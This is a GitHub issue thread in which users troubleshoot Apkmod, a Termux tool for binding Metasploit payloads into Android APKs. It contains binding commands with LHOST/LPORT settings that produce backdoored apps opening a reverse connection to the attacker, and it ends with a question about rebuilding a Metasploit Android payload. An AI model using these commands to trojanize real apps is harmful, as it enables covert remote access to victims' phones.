### ISSUE TITLE
Unable to rebuild apk with apktool

### ISSUE THREAD

**Issue by Chingo-X** [Hax4us/Apkmod#10] opened 2019-09-30 14:48 UTC
![Screenshot_20190930-164315_Termux](https://user-images.githubusercontent.com/52953017/65889614-d6883000-e3a1-11e9-959c-9aea825eadc0.png)
After ~ 1h and 30 mins for binding apk only 3 mbs it failed .

Any solve plz ? Thanks

**Comment by Hax4us** [comment] 2019-09-30 15:39
You should try `-a` option for example `apkmod -a -b yourapk.apk -o output.apk lhost=? lport=?`

**Comment by Chingo-X** [comment] 2019-09-30 23:36
> You should try `-a` option for example `apkmod -a -b yourapk.apk -o output.apk lhost=? lport=?`
> Btw what's name of original app ?

Well I used same ur code with -a as u typed here and still says same bug 

Note : why it's always taking very much time ? I just using app 3 mbs only to binding payload and taking like 2 hrs it's normally ?
![Screenshot_20191001-013430_Termux](https://user-images.githubusercontent.com/52953017/65924183-e75d9380-e3eb-11e9-9ef6-cfa70755eaba.png)

**Comment by Hax4us** [comment] 2019-10-01 04:31
2 hrs ? No it's not normal and please give your `app-release.apk`

**Comment by Chingo-X** [comment] 2019-10-01 05:14
[app-release.zip](https://github.com/Hax4us/Apkmod/files/3674509/app-release.zip)
Another question sry 
I can use tmux-bunch on pie ?

**Comment by Hax4us** [comment] 2019-10-01 12:57
Closed via https://github.com/Hax4us/Apkmod/commit/c1b151972934324f8615c72f60684a678c20b24a

**Comment by Hax4us** [comment] 2019-10-02 03:10
Try this before binding `rm $PREFIX/share/TermuxAlpine/root/.local/share/apktool/framework/1.apk`
Then bind with -a

**Comment by Hax4us** [comment] 2019-10-02 04:51
Now do `apkmod -u`

**Comment by Chingo-X** [comment] 2019-10-02 09:38
First thing, this code giving me error rm $PREFIX/share/TermuxAlpine/root/.local/share/apktool/framework/1.apk
Cuz no .Local path even, I checked even with ls -alt to see if it's hidden or not
And I update and its not binding even
![Screenshot_20191002-113432_Termux](https://user-images.githubusercontent.com/52953017/66034214-1d446a00-e509-11e9-809b-cd320e7f3f73.png)

**Comment by Hax4us** [comment] 2019-10-02 10:07
I can't reproduce your problem as It's working well in my device
![Screenshot_2019-10-02-15-33-20-648_com termux](https://user-images.githubusercontent.com/30441647/66036159-33165700-e52a-11e9-9dd2-3511f288c1e9.png)

Can you do like this and give screenshot here 
`sh -x $(which apkmod) -a -b .........`

**Comment by Chingo-X** [comment] 2019-10-02 10:31
![Screenshot_20191002-123027_Termux](https://user-images.githubusercontent.com/52953017/66037668-76fc6280-e510-11e9-98ec-74f8cd87ac6a.png)
![Screenshot_20191002-123033_Termux](https://user-images.githubusercontent.com/52953017/66037670-7794f900-e510-11e9-889e-f76bcc97bdd9.png)
![Screenshot_20191002-123005_Termux](https://user-images.githubusercontent.com/52953017/66037671-7794f900-e510-11e9-924c-726da9a3a0d2.png)

This everything 
And I found another user have same my probs .

**Comment by Hax4us** [comment] 2019-10-02 10:42
I did not say to execute/copy my example 
You must do like `sh -x $(which apkmod) -a -b yourap.apk -o bind.apk lhost=? lport=?`

**Comment by Chingo-X** [comment] 2019-10-02 11:25
How to fully uninstall the tool ?

**Comment by Hax4us** [comment] 2019-10-02 12:40
just do 
1. `rm $(which apkmod)`
2. `rm -rf $PREFIX/share/TermuxAlpine`
3. `rm -f $HOME/setup.sh`

**Comment by Chingo-X** [comment] 2019-10-02 16:02
> I did not say to execute/copy my example
> You must do like `sh -x $(which apkmod) -a -b yourap.apk -o bind.apk lhost=? lport=?`

![Screenshot_20191002-180127_Termux](https://user-images.githubusercontent.com/52953017/66060963-d1141c80-e53e-11e9-93c6-c291e248fd2a.png)

**Comment by Chingo-X** [comment] 2019-10-02 16:03
> just do
> 
> 1. `rm $(which apkmod)`
> 2. `rm -rf $PREFIX/share/TermuxAlpine`
> 3. `rm -f $HOME/setup.sh`

I tried to fully clear and reinstall it again but same 
![Screenshot_20191002-180116_Termux](https://user-images.githubusercontent.com/52953017/66061005-e426ec80-e53e-11e9-8751-56efc13801f1.png)

**Comment by Hax4us** [comment] 2019-10-07 05:09
@Chingo-X what's the output of `termux-info`

**Comment by Chingo-X** [comment] 2019-10-07 23:17
> @Chingo-X what's the output of `termux-info`

![Screenshot_20191008-011503_Termux](https://user-images.githubusercontent.com/52953017/66355911-429e0180-e969-11e9-9d10-56d4ad899fb1.png)
Here u are

**Comment by Baloch121** [comment] 2019-10-10 08:49
i am also facing an issue  like jt shows this msg when i bind

apkmod -a -b /sdcard/gps.apk -o /sdcard/pc/binded.apk LHOST=192.168.I.101 LPORT=4444
[*] Binding /storage/emulated/0/gps.apk
/data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.
Using APK template: /storage/emulated/0/gps.apk
Error: The following options failed to validate: LHOST.
[!] Try again with -a option
But if still can't bind, take screenshot and open a issue on github
$ apkmod -a -b /sdcard/gps.apk -o /sdcard/pc/binded.apk LHOST=127.0.0.1 LPORT=4444
[*] Binding /storage/emulated/0/gps.apk
/data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.
Using APK template: /storage/emulated/0/gps.apk
[*] Decompiling original APK..

**Comment by Baloch121** [comment] 2019-10-10 08:52
the same msg dsplye when i use msfconsole  installed by ur script .

/data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.

**Closed** 2019-10-20 11:13 UTC

**Comment by Hax4us** [comment] 2019-10-20 11:15
@Baloch121 your lhost is invalid as you can see the same in error 
@Chingo-X can you test now after updating to version `1.4`

**Comment by Chingo-X** [comment] 2019-10-29 00:54
> @Baloch121 your lhost is invalid as you can see the same in error
> @Chingo-X can you test now after updating to version `1.4`
Still getting errors
![Screenshot_20191029-005802_Termux](https://user-images.githubusercontent.com/52953017/67728806-487e8400-f9f7-11e9-92a5-ddb569c11fef.png)
![Uploading Screenshot_20191029-005820_Termux.png…]()

**Comment by Hax4us** [comment] 2019-10-29 06:21
I committed some changes today , can you update again by `apkmod -u`

**Comment by Chingo-X** [comment] 2019-10-29 08:44
> I committed some changes ( only for aarch64 ) today , can you update again by `apkmod -u`
> If you have any other arch instead of aarch64 then wait , I will also upload aapt2 for all rest archs with in 24 hour

I am arm

**Comment by Chingo-X** [comment] 2019-10-29 10:31
![Screenshot_20191029-122856_Niagara_Launcher](https://user-images.githubusercontent.com/52953017/67759329-ee59df00-fa47-11e9-8cf6-aae2aca88a85.png)
 However this is after update

**Comment by Hax4us** [comment] 2019-10-30 03:09
Done now  you can update

**Comment by Chingo-X** [comment] 2019-10-30 09:52
> > i am arm
> 
> Done now you can update


Finally it's done on this APK !!!!  But I still need to test another apps ! 
Also it's still takes long time to compile but np it's working !
![Screenshot_20191030-114955_Termux](https://user-images.githubusercontent.com/52953017/67847459-91276180-fb0b-11e9-9806-49bd9c775f17.png)

**Comment by ghost** [comment] 2022-02-14 20:26
![Screenshot_2022-02-15-04-25-14-29_84d3000e3f4017145260f7618db1d683](https://user-images.githubusercontent.com/77589210/153940795-672837dd-9fcd-4e9e-aff7-dae7d59b288c.jpg)

Is anyone know how to solve this prob..im so confuse...i cant rebuild the metasploit android payload after i decompile it (btw i didnt do any changes after i decompile the apk)

**Comment by Xinul-Hacker** [comment] 2022-02-14 20:29
Use MT Manager VIP to recompile.

https://t.me/MODDERAPPS/683

Regards

xinul
